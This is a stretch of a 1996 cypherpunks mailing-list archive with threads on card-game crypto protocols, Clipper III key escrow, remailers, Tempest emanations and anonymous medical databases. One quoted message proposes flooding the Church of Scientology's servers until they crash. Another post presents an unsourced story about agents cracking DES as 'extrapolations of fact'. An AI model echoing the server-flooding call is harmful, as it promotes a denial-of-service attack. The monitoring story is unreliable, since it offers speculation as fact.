games combined the collecting and trading of baseball cards with traditional
aspects of card playing. Cards were issued by a central 
authority/publisher (Wizards of the Coast in the case of MtG). Each 
player uses his or her own deck; cards that are not played remain secret; 
however the same deck mut be used in each round of a match. tournament 
games are adjudicated by an umpire.

Design a set of crypto protocols to support the issuing, trading, and 
playing of such card games in real time (100ms compute time per move)

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Wed, 29 May 1996 17:47:42 +0800
To: frantz@netcom.com
Subject: Re: Clipper III analysis
Message-ID: <199605290626.CAA24463@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 28 May 1996 17:37:05 -0700
>From: frantz@netcom.com (Bill Frantz)
>Subject: Re: Clipper III analysis

> They want to GAK all keys including signature keys.  Now
>think, to whom in your life are you willing to grant unlimited power of
>attorney?  Your spouse?  Your lawyer?  Your banker?  Your employer?  Your
>government?

Almost.  Actually, they mention at one point that they don't want to 
GAK the signature keys, but it's almost an afterthought.

The thing I find peculiar is that they wand GAK through access to private
keys in a PKI, ala Micali or Banker's Trust, but the only keys which need
to be in a PKI are signature keys -- ones even they admit should not be
recovered.

Can you spell "empty intersection", boys and girls?

:)

Mighty clever of the cryptographer who started them down this path.

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Wed, 29 May 1996 20:38:47 +0800
To: cypherpunks@toad.com
Subject: Re: [crypto] crypto-protocols for trading card games
In-Reply-To: <Pine.SUN.3.91.960528235540.23126A-100000@tipper.oit.unc.edu>
Message-ID: <9605290634.AA09375@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


> In the not too distant past there was a fad for collectible trading card 
> games, the most famous of which was Magic, The Gathering (tm). These 

	Oy, don't mention that name.  I spent waaay too much money
on cards (Ah, my foolish youth.  Anyone want to buy a slightly used
Chaos Orb? :).

> games combined the collecting and trading of baseball cards with traditional
> aspects of card playing. Cards were issued by a central 
> authority/publisher (Wizards of the Coast in the case of MtG). Each 
> player uses his or her own deck; cards that are not played remain secret; 
> however the same deck mut be used in each round of a match. tournament 
> games are adjudicated by an umpire.
> 
> Design a set of crypto protocols to support the issuing, trading, and 
> playing of such card games in real time (100ms compute time per move)

	Well, here goes nothing for the playing part:

	Each player should submit a signed copy of their deck (i.e. a
listing of all the cards therin) to the umpire (if you don't want the
even umpire seeing the deck contents until afterwards, make them
submit a bit-committed symetric key and encrypt the deck manifest with
it).  Each individual card in the deck should have a unique identifier
which should be noted on the manifest.  Identifiers wouldn't need to
be sequential (in fact they might leak info to the opponent if they
were), but duplicates of the same card should each have its own id.
Depending on how you want to run things, you could allow (and probably
should require) players to submit new a ID->card list before each
round begins.

	So my deck might look like:

ID	Card
--------------------
309487	Prodigal Sorcerer
008461	Land (Plains)
663542	Land (Forrest)
....

	Before each round, opponents would exchange lists of card IDs.
Whenever a player needs to "draw", the other player takes an ID at
random off the list of IDs (and marks is as "used").  At the end of
each round the players submit a transcript of the game to the umpire
who then checks that all the cards played were in the decks, that no
duplicates of the same id/card were used, or changes of cards (i.e. ID
440315 was supposed to be a "Zombie" but the owning player said it was
a "Yawgmoth's Daemon").

	If you want to do away with the umpire (for casual play
between two people), have opponents swap the encrypted deck manifest
and bit commit to key used.  Afterwards they can double check for
cheating themselves.  Something you might want to allow is letting a
player include extra IDs which map to "no card, pick again".  This
would allow players to disguise the exact size of their deck (although
this would only allow for puffing up a deck, not making it appear
smaller).

	As for issuing and trading cards, maybe store cards as signed
certificates (something along the lines of "card name & serial number"
signed by the owner, then by the issuer).  This would make trading a
bit of a problem as you couldn't give the card away without the issuer
(Online clearing for Magic cards? :).  And there's the problem of how
do you tell who actually owns the card (if the issuer keeps a list of
serial number->owners that might work, but again that needs online
clearing).  I missed all the discussion on digital bearer bonds a
while back, but something like that might could be applied here.

	Don't know if that's what you were looking fore, but it's all
I can think of at this late hour and I'm sure someone will shoot holes
all through it anyhow. :) What do you think, sirs?

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 May 1996 19:04:40 +0800
To: bruce@aracnet.com
Subject: Re: Philosophy of information ownership
Message-ID: <01I59H7KD7P48Y5191@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bruce@aracnet.com"  "Bruce Baugh" 28-MAY-1996 18:50:34.36

>A separate problem arises when the government compels the disclosure of
>information for one purpose - getting a driver's license, say - and then
>turns around and sells it to others. It's much harder to either negotiate a
>new contract or go to a competitor when the other party is a government.

	Quite. A related problem is when the government generates some
information attached to you - the most obvious case being a social security
number. Should a private company (e.g., a credit bureau) be allowed to make
use of such? On the one hand, it would definitely limit companies not to be
able to... on the other hand, you were coerced into having that information
attached to you. One option is to have multiple possible SSNs for each person,
but that gets into the problem of the credit bureaus, etcetera, may not deal
with people who use a new SSN. It's their choice... but they're only able to
make that choice because of governmental interference.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 May 1996 20:14:30 +0800
To: richieb@teleport.com
Subject: Re: [Fwd: --> CRISIS on USENET -- SIGN THE PROTEST STATEMENT VIAE-MAIL]
Message-ID: <01I59HR1QWW68Y5191@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"richieb@teleport.com"  "Rich Burroughs" 28-MAY-1996 19:12:55.39

>In the last week, there have been several thousand (and rapidly approaching
>10,000!) short posts swamping the newsgroup alt.religion.scientology (a.r.s.)
>by a person or persons unknown.  They are coming from several accounts, most
>of them forged or bogus, and when the account is closed by its site
>administrator based on complaints, the flood begins anew elsewhere.  In at
>least one instance a mail-to-news gateway has been used, necessitating the
>administrator to close all posting to a.r.s.  That one gateway has received,
>last we heard, 886 attempted posts by the spammer within a 28 hour period
>(which fortunately never reached their intended destination -- but thousands
>of others have.)

>3)  The use of semi-anonymous "throw-away" accounts somewhat follows the same
>    pattern used recently to cancel posts containing portions of CoS' "secret"
>    scriptures, and which used the boiler-plate statement "Cancelled due to
>    copyright infringement" as the justification for the clearly illegal
>    cancels.

>   b) Kill files work by finding posts having certain identifiable attributes
>      in the header or message body, such as the From: address -- but as the
>      spam on a.r.s. shows, we've got a moving target that will resist kill
>      files.  Any organization with enough money can keep getting throw-away
>      accounts that cannot be traced to the organization.  They can also alter

	I am curious as to what systems these throw-away accounts are on; they
would appear to be good output systems for ephemeral remailer endpoints.
Admittedly, I suspect that this will take ecash remailers unless they're all
through systems like aol.com that accept credit cards with inadequate
verification (from what I know, check digit(s) only).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 May 1996 19:54:59 +0800
To: hfinney@shell.portal.com
Subject: Re:  Remailer chain length?
Message-ID: <01I59JCT7T2Q8Y5191@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal" 28-MAY-1996 21:35:03.17

>Or better still, run one remailer on the machine, and use it multiple
>times in the chain.  It seems to me that one remailer on a machine is
>better than several because it will allow more mixing of messages.  If
>two messages enter a machine and later leave, it may be possible to
>distinguish them if they went to different remailers and left with
>different From: addresses (or other header fields) as a result.  If they
>had both gone to the same remailer it would be harder to tell them
>apart.

	But you could get a massive amount of mixing of messages, by this
logic, simply by having 1 gigantic remailer. It'd have a vast traffic flow
and could do a lot of latency, etcetera. But this also means that whoever
runs it can trace everything - and whoever breaks into it can trace everything.
While multiple remailers on the same machine isn't ideal for this purpose (if
root is cracked, they all are cracked), it's better for this aspect than 1
remailer; root can be assumed to be harder to crack than a non-root-account
remailer. Moreover, this is assuming one machine, or an interlinked group of
machines set up such that there is one root account for all of them; separating
the remailers into machines with different roots would help. The rubber-hose
attack on the sysadmin is still a problem, though.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Wed, 29 May 1996 17:47:22 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Clipper III analysis
In-Reply-To: <add106be0902100435f8@[205.199.118.202]>
Message-ID: <Pine.3.89.9605290539.A27874-0100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain



	Tim:

On Tue, 28 May 1996, Timothy C. May wrote:

> document and the government will have to admit that this is a possibility,
> and admits that anyone in government with access to the escrowed data base
> could have done the signing....well, digital signatures will lose much of
> their value immediately.

	A good Questioned Document Examiner will be able to demonstrate
	that the signed document in question was not authored by Joe 
	Blow, even if it contains his digital signature.  

	Of course, the question becomes one of whether or not
	Joe Blow can afford the $5K he will be charged, to prove
	his innocence.    
	
        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 29 May 1996 12:44:54 +0800
To: andrew_loewenstern@il.us.swissbank.com (Andrew Loewenstern)
Subject: Re: Tempest Info
In-Reply-To: <9605281908.AA00554@ch1d157nwk>
Message-ID: <199605282356.JAA29834@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> Bill Stewart writes:
> >  Also, of course, your electrical power system needs to be
> >  shielded and filtered, so only 60Hz gets through, unless you
> >  plan to stick to laptops and bring in spare battery packs.
> 
> At HoHoCon a few years ago, someone did a tempest demo and mentioned that  
> signals could be recovered from water pipes!  Fire sprinkler systems were  
> specifically mentioned...

Water pipes are often form the earth line. If only 60hz (US) can get through
the power cables then only 60 hz can get into the water pipes (I'll ignore
re-radiating, because water pipes are the least of your problems there).

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 29 May 1996 21:41:04 +0800
To: cypherpunks@toad.com
Subject: Internet traffic is monitored.
Message-ID: <199605290937.LAA16955@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 28 May 1996 10:03:11 -0700
X-Sender: bstout@osc.hidata.com
To: Firewalls@GreatCircle.COM, Return requested <firewalls@GreatCircle.COM>
From: Bill Stout <bill.stout@hidata.com>
Subject: Re: Encryption Technology
Sender: firewalls-owner@GreatCircle.COM

At 09:05 PM 5/22/96 -0700, Michael Dillon wrote:
>...
>RTFM
><SNIP - Other literary content deleted>

On the Encryption note, and I swear not along the lines of the 'DOJ' 
and 'FBI Snooping' Big-Brother events, I heard another story recently.

# begin story

A person working on the MBONE project did an unannounced experiment
across the internet using Triple-DES for MBONE, and the very next day, 
'ATF' agents knocked on his door and warned him against exporting 
munitions.  The experimentor was shaken by the fact that agents 
approached him so quickly after the experiment.

# end story

Extrapolations of fact:
   1.   Internet traffic is monitored.
   2.   The ability to snoop for encrypted traffic is present
   3.   The ability to identify encryption levels is present
        (How else can they differentiate DES-1 from DES-3?)
   4.   The ability to crack DES-1 in near real-time mode is present.
        (See above).
   5.   If above=true, then Feds dropping the Zimmerman PGP case probably
        also points to it also being crackable in a similar manner.
   6.   Using encryption only flags traffic for capture and decryption, 
        using strong encryption makes you all that more interesting.

Sorry, couldn't resist.  I'll try not to start a threads about 
electro-plasma propulsion craft at Area 51, metallic-ceramic skin 
and pulse-jets on the Aurora spy plane, heat-imaging video cameras 
on satellites and planes that can watch you through your houses' roof, 
etc.  :)

Bill








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyal Collins <lyalc@ozemail.com.au>
Date: Wed, 29 May 1996 19:54:22 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: Tempest Info
In-Reply-To: <199605282356.JAA29834@suburbia.net>
Message-ID: <31AD02EB.5BF5@ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Julian Assange wrote:
> 
> >
> > Bill Stewart writes:
> > >  Also, of course, your electrical power system needs to be
> > >  shielded and filtered, so only 60Hz gets through, unless you
> > >  plan to stick to laptops and bring in spare battery packs.
> >
> > At HoHoCon a few years ago, someone did a tempest demo and mentioned that
> > signals could be recovered from water pipes!  Fire sprinkler systems were
> > specifically mentioned...
> 
> Water pipes are often form the earth line. If only 60hz (US) can get through
> the power cables then only 60 hz can get into the water pipes (I'll ignore
> re-radiating, because water pipes are the least of your problems there).

As the water pipe can form a signal "drain", monitoring that with respoect to an 
artificial refernce "earth" allowsthe signal(s) to be reccovered, unless the waterpipe is of very low 
impedance.
lyal

-- 
All mistakes in this message belong to me - you should not use them!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ira <ira@panix.com>
Date: Mon, 3 Jun 1996 05:38:43 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <31A9718A.5DD8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JOlson <jolson3@netbox.com>
Date: Thu, 30 May 1996 01:42:03 +0800
To: cypherpunks@toad.com
Subject: INteresting tidbit
Message-ID: <199605291307.NAA01224@netbox.com>
MIME-Version: 1.0
Content-Type: text/plain


The following text is an e-mail I picked up from a firewall listserver.

Return-Path: <jolson3@netbox.com>
Date: Tue, 28 May 1996 10:03:11 -0700
X-Sender: bstout@osc.hidata.com
To: Firewalls@GreatCircle.COM, Return requested <firewalls@GreatCircle.COM>
From: Bill Stout <bill.stout@hidata.com>
Subject: Re: Encryption Technology
Sender: firewalls-owner@GreatCircle.COM

Real-To:  Bill Stout <bill.stout@hidata.com>

At 09:05 PM 5/22/96 -0700, Michael Dillon wrote:
>...
>RTFM
><SNIP - Other literary content deleted>

On the Encryption note, and I swear not along the lines of the 'DOJ' 
and 'FBI Snooping' Big-Brother events, I heard another story recently.

# begin story

A person working on the MBONE project did an unannounced experiment
across the internet using Triple-DES for MBONE, and the very next day, 
'ATF' agents knocked on his door and warned him against exporting 
munitions.  The experimentor was shaken by the fact that agents 
approached him so quickly after the experiment.

# end story

Extrapolations of fact:
   1.   Internet traffic is monitored.
   2.   The ability to snoop for encrypted traffic is present
   3.   The ability to identify encryption levels is present
        (How else can they differentiate DES-1 from DES-3?)
   4.   The ability to crack DES-1 in near real-time mode is present.
        (See above).
   5.   If above=true, then Feds dropping the Zimmerman PGP case probably
        also points to it also being crackable in a similar manner.
   6.   Using encryption only flags traffic for capture and decryption, 
        using strong encryption makes you all that more interesting.

Sorry, couldn't resist.  I'll try not to start a threads about 
electro-plasma propulsion craft at Area 51, metallic-ceramic skin 
and pulse-jets on the Aurora spy plane, heat-imaging video cameras 
on satellites and planes that can watch you through your houses' roof, 
etc.  :)

Bill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 30 May 1996 05:07:56 +0800
To: kashi <youssefy@ucla.edu>
Subject: Re: [Fwd: --> CRISIS on USENET -- SIGN THE PROTEST STATEMENT  VIA E-MAIL]
Message-ID: <199605291534.IAA27683@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:21 PM 5/28/96 -0700, you wrote:
>At 11:52 AM 5/28/96 +0000, you wrote:
>>This is a post from Jon Noring (noring@netcom.com) about the recent 
>>spamming of alt.religion.scientology.  I thought he summed the 
>>situation up very well.
>
>Why don't we get together an organized spamming of the CoC's servers?
>Let's give them a taste of their medicine!
>I bet that we can make their servers crash before they know what him them!

Please take that to alt.religion.scientology or some other relevant list.

[ I recently found a Dianetics Personality Test on my car.
I haven't put it in the toaster yet :-)                    ]

#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 30 May 1996 04:03:49 +0800
To: "'cypherpunks@toad.com>
Subject: WSJ on "IRS-bashing"
Message-ID: <01BB4D3A.09B7C120@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


According to WSJ, Leslie B. Samuels, "Treasury's top tax-policy official" says that "IRS-bashing is 'counterproductive and harmful'" -- and that "destructive rhetoric ... hurts the tax system and society" [elisions are the WSJ's]

What if a the CDA grew little by little by little until it covered statements deemed "destructive rhetoric" .... hmmm. I mean after all, if it harms society....!

Let's see ... Treasury: BATF. Key Escrow.
GAK, anyone?

;)   keep up the good work.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 30 May 1996 05:37:27 +0800
To: SINCLAIR  DOUGLAS N <proff@suburbia.net (Julian Assange)
Subject: Re: Tempest Info
Message-ID: <199605291556.IAA21231@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:27 AM 5/29/96 -0400, SINCLAIR  DOUGLAS N wrote:
>> Water pipes are often form the earth line. If only 60hz (US) can get through
>> the power cables then only 60 hz can get into the water pipes (I'll ignore
>> re-radiating, because water pipes are the least of your problems there).
>
>The high-frequency harmonics from your computers are probably above the
>cutoff frequency of the water-pipes when considered as circular waveguides.
>The water filling will act as a dielectric, bringing F0 down.  So, it
>is conceivable that extremely high frequency radiation (>3 Ghz) could
>propagate well in a water pipe.

No, you misunderstood.  The RF wouldn't be transmitted on the inside of the 
pipes (how could it get inside, anyway?) but on the outside.  Since most 
information-containing appliances are well-grounded, there is at least a 
strong possibility that a ground connection would carry enough interesting 
RF to be useful to tap.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 May 1996 04:57:55 +0800
To: jonathon <grafolog@netcom.com>
Subject: Re: Clipper III analysis
Message-ID: <add1c03814021004c9a5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:54 AM 5/29/96, jonathon wrote:

>        A good Questioned Document Examiner will be able to demonstrate
>        that the signed document in question was not authored by Joe
>        Blow, even if it contains his digital signature.

I was of course talking about digital signatures, not handwritten signatures.

I would be very interested to hear how a "Questioned Document Examiner" can
possibly determine that a digital signature was not applied by a particular
person.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 30 May 1996 05:31:35 +0800
To: cypherpunks@toad.com
Subject: Re: Internet traffic is monitored.
Message-ID: <199605291605.JAA21685@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 AM 5/29/96 +0200, Anonymous wrote:
>Date: Tue, 28 May 1996 10:03:11 -0700
>X-Sender: bstout@osc.hidata.com
>To: Firewalls@GreatCircle.COM, Return requested <firewalls@GreatCircle.COM>
>From: Bill Stout <bill.stout@hidata.com>
>Subject: Re: Encryption Technology
>Sender: firewalls-owner@GreatCircle.COM
>

>Extrapolations of fact:
>   1.   Internet traffic is monitored.
>   2.   The ability to snoop for encrypted traffic is present
>   3.   The ability to identify encryption levels is present
>        (How else can they differentiate DES-1 from DES-3?)
>   4.   The ability to crack DES-1 in near real-time mode is present.
>        (See above).
>   5.   If above=true, then Feds dropping the Zimmerman PGP case probably
>        also points to it also being crackable in a similar manner.
>Bill


I think the Feds non-prosecution of Zimmermann had absolutely nothing to do 
with the crackability/non-crackability of PGP.  They just had an extremely 
weak case:  They probably had no way to demonstrate that any particular 
person exported PGP, which means that prosecuting Zimmermann would have 
looked like sour grapes.  (or, in the alternative, if they had records to 
show that PGP was exported, they might not have wanted to reveal the extent 
of their Internet monitoring.)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Thu, 30 May 1996 02:06:20 +0800
To: proff@suburbia.net (Julian Assange)
Subject: Re: Tempest Info
In-Reply-To: <199605282356.JAA29834@suburbia.net>
Message-ID: <96May29.092735edt.10690@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Water pipes are often form the earth line. If only 60hz (US) can get through
> the power cables then only 60 hz can get into the water pipes (I'll ignore
> re-radiating, because water pipes are the least of your problems there).

The high-frequency harmonics from your computers are probably above the
cutoff frequency of the water-pipes when considered as circular waveguides.
The water filling will act as a dielectric, bringing F0 down.  So, it
is conceivable that extremely high frequency radiation (>3 Ghz) could
propagate well in a water pipe.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 May 1996 06:04:43 +0800
To: cypherpunks@toad.com
Subject: Re: WSJ on "IRS-bashing"
Message-ID: <add1cc35180210049ac7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:36 PM 5/29/96, geeman@best.com wrote:
>According to WSJ, Leslie B. Samuels, "Treasury's top tax-policy official"
>says that "IRS-bashing is 'counterproductive and harmful'" -- and that
>"destructive rhetoric ... hurts the tax system and society" [elisions are
>the WSJ's]
>
>What if a the CDA grew little by little by little until it covered
>statements deemed "destructive rhetoric" .... hmmm. I mean after all, if
>it harms society....!

If the CDA is upheld by the Supreme Court, which would surprise me, then
"free speech" as we know it is gone completely.

By the way, it's _already_ the case that "hurtful speech" can be prosecuted
as a civil rights violation of a class of persons. If I refer to women as
"bitches and hoes" ("hoe" = "whore," in certain American dialects) I am, as
I understand things, technically in violation of various laws which outlaw
the repression, subjugation, marginalization, and encheferation of women
and other colored people.

(Oh, I can say these things in the privacy of my home without fear of
reprisal by the State, or even in small groups. But if I say this in
public, or in a company, or in many other fora, look out!)

Liberty has been given away for several decades in this country.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay.Olbon@dynetics.com (Clay Olbon II)
Date: Thu, 30 May 1996 02:19:05 +0800
To: cypherpunks@toad.com
Subject: Statistical analysis of anonymous databases
Message-ID: <v01540b02add1fc6e4658@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


I ran across an interesting problem on the STAT-L mailing list.  I came up
with an initial solution, but it didn't fully solve the problem.  I will
summarize:

In medical research (this particular application - there are others I am
sure) it is desirable to have a large database of individual medical
histories available to search for correlations, risk factors, etc.  The
problem, of course, is that many individuals want their medical histories
kept private.  It is therefore necessary to maintain a database that is not
traceable back to individuals.  An additional requirement is that people
must be able to add additional information to their records as it becomes
available.  The researcher who initially posed the question suggested
adding random data to "encrypt anonymity".

My first cut solution was to hash the individual's name (perhaps including
some other info or random info to thwart dictionary attacks) and send the
records in under the hashed name.  If done correctly, this should protect
the anonymity of the record.  The problem with this is that with the volume
of data available in a medical record, it is very probable that a person
could be tied to that record.

Does anyone have any insights into this problem?  <disclaimer> This is of
purely academic interest to me, I don't know the person who asked the
intial question (other than through email).  It just sounds like a neat
problem. </disclaimer>

        Clay






---------------------------------------------------------------------------
Clay Olbon II            | Clay.Olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: on web page
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
                     TANSTAAFL
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 May 1996 03:00:46 +0800
To: minow@apple.com (Martin Minow)
Subject: Re: Notes from the SF Physical Cypherpunks meeting
In-Reply-To: <v02140b04adbdbf22398d@[17.202.12.102]>
Message-ID: <199605291533.KAA09610@homeport.org>
MIME-Version: 1.0
Content-Type: text



Dial-back does not add security to a system, and in fact, often
reduces system security.

	Dial back takes responsibility for authentication from your
system (where it belongs), and transfers it to the phone company.
Telco switches have a long history of being comprimised.  Assuming a
telco switch gets back to the right number when you're under attack is
bogus.

	Relying on an external system like this is evidence of shoddy
thinking about security issues.  That should have been obvious in the
mid 70's, when telcos knew that their switches were being abused by
phreaks.

Adam

(playing catch-up, but this is a pet peeve.)

Martin Minow wrote:

| For example, the initial Swedish implementation of a national
| criminal database in the mid 1970's (equivalent to the US NCIC) used
| dialback telexes to prevent unauthorized (and untracked) access.
| A recent newspaper article noted that some police officers were
| being investigated for unauthorized access to the personal information
| of a collegue who had complained of sexual harassment.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 May 1996 03:44:54 +0800
To: jolson3@netbox.com
Subject: Re: INteresting tidbit
In-Reply-To: <199605291307.NAA01224@netbox.com>
Message-ID: <199605291501.LAA01290@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



JOlson writes:
> The following text is an e-mail I picked up from a firewall listserver.

I don't believe any of the story.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 May 1996 04:28:56 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: [crypto] crypto-protocols for trading card games
In-Reply-To: <Pine.SUN.3.91.960528235540.23126A-100000@tipper.oit.unc.edu>
Message-ID: <Pine.3.89.9605291001.A10285-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 29 May 1996, Simon Spero wrote:

> Design a set of crypto protocols to support the issuing, trading, and 
> playing of such card games in real time (100ms compute time per move)

I'd been thinking about it from the opposite point of view: make up a card
game (possibly electronic, like what you're proposing) that acts as intro
to crypto for the untamed hordes of game players. 

As you noticed, Simon, cardgames are a good analogue for cryptography.
They operate on the principle of secrecy/discovery (turning over the
cards), there are analogues for all sorts of algorithms (rules of the
game), we have randomness (shuffling), concepts of authentication (to beat
cheaters, no cards up the sleaves, no color-laser-photocopied Magic
cards...), tokens and smartcards (the cards themselves), integer numbers,
and a whole host of special characters a la Alice, Bob, Trent, etc.
(Kings, Queens, Jacks, Jokers). In short, all the building blocks for
working crypto protocols and their interfaces, needing no introduction for
most people. I can sort of even see a representation of a public card scheme
with signatures and certs (I'll have to go grab a deck and try).

Presumably, given a careful choice rules one could do for crypto what
Solitaire did for Windows 3.1 . I see no reason why a card game could not
be an interface for pgp or remailers, or an easier demonstration for
DC-nets, blinding or complicated market protocols. One might even build a
programming language out of such building blocks (probably for scripting).
Poker for Java--Do not Export! (If the CJR for the RSA-Perl T-shirt was
absurd wait till the authorities get stuck with this one.) (Mind you, I 
probably wouldn't use an imperative language like Java for the scripting, 
but that's just me.)

This is of course all idle speculation, 'cause I'm lazy and have neither 
the time nor the expertise. It's all yours folks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 May 1996 04:35:08 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: [Fwd: --> CRISIS on USENET -- SIGN THE PROTEST STATEMENT VIA E-MAIL]
In-Reply-To: <01I59HR1QWW68Y5191@mbcl.rutgers.edu>
